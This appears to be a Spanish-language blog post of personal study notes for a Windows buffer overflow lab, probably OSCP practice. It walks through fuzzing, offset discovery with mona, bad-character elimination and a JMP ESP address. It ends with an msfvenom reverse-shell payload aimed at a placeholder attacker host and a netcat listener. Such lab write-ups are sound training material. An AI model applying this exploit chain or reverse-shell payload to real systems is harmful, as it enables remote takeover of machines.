python fuzzer.py

Pasted image 20210616100719.png

/usr/share/metasploit-framework/tools/exploit/pattern\_create.rb -l 1100 o se puede usar esto msf-pattern_create -l 2400

Pasted image 20210616100839.png

python3 exploit.py

!mona findmsp -distance 2400

Pasted image 20210616112039.png

Offset es 2026

Ahora cambiamos el offset en el archivo de exploit.py al numero offset Y tambien rtn le ponemos un valor de "BBBB"

Pasted image 20210616112232.png

Reiniciar app

!mona bytearray -b "\x00"

chequear que bytearray.bin este generado en el folder de mona

python3 bad_characters.py

Reiniciar app Pegar el output a payload

!mona compare -f C:\mona\oscp\bytearray.bin -a <address>

Pasted image 20210616112929.png

escribimos los bad chars 00 a9 aa cd ce d4 d5

Donde dice ESP le damos click derecho y Follow in Dump

Pasted image 20210616113332.png

Le quitamos el xa9 del payload hasta llegar al ultimo bad_char

Pasted image 20210616113425.png

Ahora bad char es \x00\xa9\

Donde dice ESP le damos click derecho y Follow in Dump

Pasted image 20210616113731.png

Le quitamos el xcd del payload hasta llegar al ultimo bad_char

Pasted image 20210616113826.png

Ahora bad char es \x00\xa9\xcd\

Donde dice ESP le damos click derecho y Follow in Dump

Pasted image 20210616114104.png

Le quitamos el xd4 del payload hasta llegar al ultimo bad_char

Pasted image 20210616114229.png

Ahora bad char es \x00\xa9\xcd\xd4

--Al terminar cambiando todos los bad chars deberia de salir unmodified como ultimo paso y nada de bad_chars

!mona jmp -r esp -cpb "\x00\xa9\xcd\xd4"

Pasted image 20210616115137.png

625011af

Pasted image 20210616115606.png

msfvenom -p windows/shell\_reverse\_tcp LHOST=KALI_IP LPORT=4444 EXITFUNC=thread -b "\x00\xa9\xcd\xd4" -f c

padding = "\x90" * 16

nc -lvnp 4444

Pasted image 20210616120023.png

blog

copyright©2022 Cu3rv0x all rights reserved